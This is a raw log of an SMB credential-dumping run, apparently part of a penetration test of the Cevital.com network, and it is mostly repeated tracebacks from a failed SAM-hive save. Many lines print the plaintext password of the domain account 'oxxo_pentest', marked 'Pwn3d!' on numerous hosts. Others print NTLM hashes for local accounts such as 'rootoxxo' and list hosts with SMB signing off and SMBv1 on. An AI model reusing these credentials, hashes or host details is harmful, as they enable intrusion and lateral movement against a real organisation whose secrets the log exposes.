smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

[03:24:39] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.163.31 445 L2-SERVER-PC [*] Windows 7 Professional 7601


Service Pack 1 x64 (name:L2-SERVER-PC) (domain:L2-SERVER-PC) (signing:False)
(SMBv1:True)
SMB 10.34.160.113 445 OXODT020031 [*] Dumping SAM hashes
SMB 10.34.160.61 445 OXOLT020024 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.70 445 OXODT020010 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.113 445 OXODT020031
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
[03:24:40] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied
SMB 10.34.160.113 445 OXODT020031
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.113 445 OXODT020031
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.122 445 OXODT02090006 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.113 445 OXODT020031


WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.113 445 OXODT020031 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.132 445 OXODT020065 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:41] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.70 445 OXODT020010 [*] Dumping SAM hashes


SMB 10.34.160.54 445 OXODT020087 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.70 445 OXODT020010
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.163.196 445 L-2090093059 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2090093059) (domain:L-2090093059) (signing:False)
(SMBv1:True)
SMB 10.34.163.197 445 L-2244778003 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2244778003) (domain:L-2244778003) (signing:False)
(SMBv1:True)
SMB 10.34.160.97 445 OXODT020097 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.70 445 OXODT020010
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.163.206 445 L-2100577031 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2100577031) (domain:L-2100577031) (signing:False)
(SMBv1:True)
SMB 10.34.163.202 445 L-2100577026 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2100577026) (domain:L-2100577026) (signing:False)
(SMBv1:True)
SMB 10.34.163.203 445 L-2100577021 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2100577021) (domain:L-2100577021) (signing:False)
(SMBv1:True)
SMB 10.34.163.210 445 L-2100577018 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2100577018) (domain:L-2100577018) (signing:False)
(SMBv1:True)
SMB 10.34.163.209 445 L-2100577015 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2100577015) (domain:L-2100577015) (signing:False)
(SMBv1:True)
SMB 10.34.160.70 445 OXODT020010
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.161.9 445 OXODT02100006 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.70 445 OXODT020010
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.70 445 OXODT020010 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.54 445 OXODT020087 [*] Dumping SAM hashes
SMB 10.34.163.221 445 L-2244778007 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2244778007) (domain:L-2244778007) (signing:False)
(SMBv1:True)
SMB 10.34.161.2 445 OXODT02030003 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.163.224 445 L-2090093031 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2090093031) (domain:L-2090093031) (signing:False)
(SMBv1:True)
SMB 10.34.163.225 445 L-2090093021 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2090093021) (domain:L-2090093021) (signing:False)
(SMBv1:True)
SMB 10.34.163.228 445 L-2090093035 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2090093035) (domain:L-2090093035) (signing:False)
(SMBv1:True)
SMB 10.34.160.54 445 OXODT020087
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
[03:24:44] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.154 445 OXOLT020010 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.54 445 OXODT020087
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.163.235 445 SOSO-PC [*] Windows 7 Ultimate 7601
Service Pack 1 x64 (name:SOSO-PC) (domain:soso-PC) (signing:False) (SMBv1:True)
SMB 10.34.163.239 445 SOSO-PC [*] Windows 10 / Server 2016
Build 16299 x64 (name:SOSO-PC) (domain:soso-PC) (signing:False) (SMBv1:False)
SMB 10.34.160.54 445 OXODT020087
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.161.8 445 OXODT02050012 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.164.33 445 OXXKASTOSL01 [*] Windows Server 2008 R2
Standard 7601 Service Pack 1 x64 (name:OXXKASTOSL01) (domain:OXXKASTOSL01)
(signing:False) (SMBv1:True)
[03:24:46] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.54 445 OXODT020087


WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.161.13 445 OXODT020022 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.54 445 OXODT020087 [+] Added 4 SAM hashes to the
database
[03:24:47] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
